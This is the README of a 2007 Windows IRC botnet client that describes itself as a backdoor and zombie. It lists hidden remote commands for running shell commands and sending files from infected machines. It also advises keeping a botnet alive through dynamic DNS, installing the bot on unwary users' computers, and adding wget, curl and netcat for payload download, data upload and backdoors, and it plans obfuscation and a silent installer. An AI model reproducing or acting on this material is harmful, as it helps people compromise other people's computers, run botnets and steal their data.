1 <>=========================================================== 1001 1001 1011 1110 0000 01101 1110 ===<>
3 /__/\ / /\ / /\ ___ ___ / /\
4 \ \:\ / /::\ / /::\ /__/\ / /\ / /:/_
5 \__\:\ / /:/\:\ / /:/\:\ \ \:\ / /:/ / /:/ /\
6 ___ / /::\ / /:/~/::\ / /:/~/:/ \ \:\ /__/::\ / /:/ /:/_
7 /__/\ /:/\:\/__/:/ /:/\:\/__/:/ /:/___ ___ \__\:\\__\/\:\__ /__/:/ /:/ /\
8 \ \:\/:/__\/\ \:\/:/__\/\ \:\/::::://__/\ | |:| \ \:\/\\ \:\/:/ /:/
9 \ \::/ \ \::/ \ \::/~~~~ \ \:\| |:| \__\::/ \ \::/ /:/
10 \ \:\ \ \:\ \ \:\ \ \:\__|:| /__/:/ \ \:\/:/
11 \ \:\ \ \:\ \ \:\ \__\::::/ \__\/ \ \::/
12 \__\/ \__\/ \__\/ ~~~~ \__\/
14 <>===== IRC Bot ================================================================ <-- Harvie 2oo7 ====<>
18 <> Subject: IRC Bot <>
19 <> Description: Remote Control/Backdoor/Zombie/etc... Everything is controled by IRC <>
23 <> Platform: Microsoft Windows (Tested on 2000, XP SP1, XP SP2) <>
24 <> Language: Ansi C + Few windows libs (Windows & WinSock) <>
25 <> Author: <-- Harvie <>
27 <> Contact: Harvie@irc.2600.net <>
29 <>=====0=======================================================================================1=====<>
30 <>======0=======================================================================================1====<>
31 <>====000=============================================================== <-- Harvie 2oo7 =====111====<>
33 <>===== INFO ================================================ 1001 1001 1011 1110 0000 01101 1110 ===<>
36 Optimalized for Dev-Cpp.
37 Compile as windows GUI app. to make a daemon.
40 There is not so big security!!!
41 If you want to keep your zombies,
42 control them only by PM or at completely secure channel!!!
43 All passwords, that are starting with your password will be accepted!!!
44 If you want to keep your botnet use Dynamic IRC server maping (by Dynamic DNS),
45 rather than sending bots directly to one server (as irc.2600.net:6667)!!!
48 - You can do all settings in source.
49 - for better security use a different password for channel and bots.
52 - Warning: all commands are case sensitive
54 - !login [login] //Bad login=logout
55 - !chanpass //Set mode +k (each bot sends this when connected)
57 <>Privileged commands (needs login)
58 - !SAY [msg] //Say msg
59 - !CMD [shell command] //Execute command @ bot (hidden console window)
60 - !CMD start [shell command] //Execute command @ bot (show console window)
61 - !head [file to send] //Send few (maxlines_to_send) lines of file
62 - !raw [line to send] //Sends raw line to server (you can OP yourself)
63 - !info //Info about zombie
64 - !time //Local time @ zombie
65 - !show //Show console window
66 - !hide //Hide console window
67 - !restart //Restart connection to server
68 - !respawn //Restart whole zombie
71 Each time when the bot starts, he executes the "hircb.rc.bat" file - hidden (UTFS).
74 If you want to add more functions to this bot, you can add them direct to the code,
75 or you can simple add executable binaries to its directory (!CMD binary.exe).
76 This binary must be fully controlled from CLI (command line).
78 <>Recommended binaries to add:
79 - Wget (wget.exe) - Allows you to download files from http & ftp (add functions online...)
80 - cURL (curl.exe) - Allows you to upload files to your server (needs some php scripts...)
82 <>Another usefull binaries:
83 - NetCat (nc.exe) - Useful (Easy Networking, Firewall test, Backdoor, etc...) - you know...
84 - Servers - FTP(SlimFTPd), HTTP(you can strip Apache), SMTP, SOCKS, Proxy
85 - Runtimes - Unix(CygWin), Java(JArX) PHP, Perl, Python
86 - NirCMD2 - (nircmdc.exe) Work with special windows features (mouse,gui,system functions,...)
87 - CLAmp (clamp.exe) - Winamp Control (Yeah! What do you expected???)
88 - Anything else - DoS, mailing (Don't do any ilegal stuff with this - just testing!!!)
91 - Use some free DNS service to move zombies across servers.
92 - Take very big care about channel security.
93 - Install this bot only at n00bz' computers, because there is no encryption
94 (anybody else can sniff and get passwords, etc...)
97 - future - Maybe some bugfixes
98 - 1.0 - Fixed for overflows, checked bounds, etc..., reformated/reidented source
99 - 1.0bRC1 - Implemented Connection checker (new thread), Implemented "!line"
100 - 1.0b - Bugfixes (cmdfile), Implemented "!respawn"
101 - 0.9 - Executing hircb.rc.bat at startup, first use "In the Wild" -> found bugs, need "!respawn"
102 - 0.8 - Hidden execution
103 - 0.7 - Implemented "!info" & "!time"
104 - 0.6 - Implemented "!login" function
105 - 0.5 - Implemented "!CMD" function
106 - other - I can't remember ;D
110 - Binary obfuscation better than UPX
112 - Test binary on "W0W MS OS Vista" (sorry, im running Linux ;)
113 - Implement some minimalistic hack, which allows you to download wget
114 - Utility for changing bot settings by direct binary patching without recompiling
115 - Automatic silent installer
118 - Use it like you want [use, change, abuse]!
119 - There is no warranty, because this is free of charge for you!
120 - There is no responsibility from side of author, because this is tool only!
121 - Only you are responsible for yours acts!
123 <>=====0=======================================================================================1=====<>
124 <>======0=======================================================================================1====<>
125 <>====000============================================================= <-- Harvie 2oo7/8 =====111====<>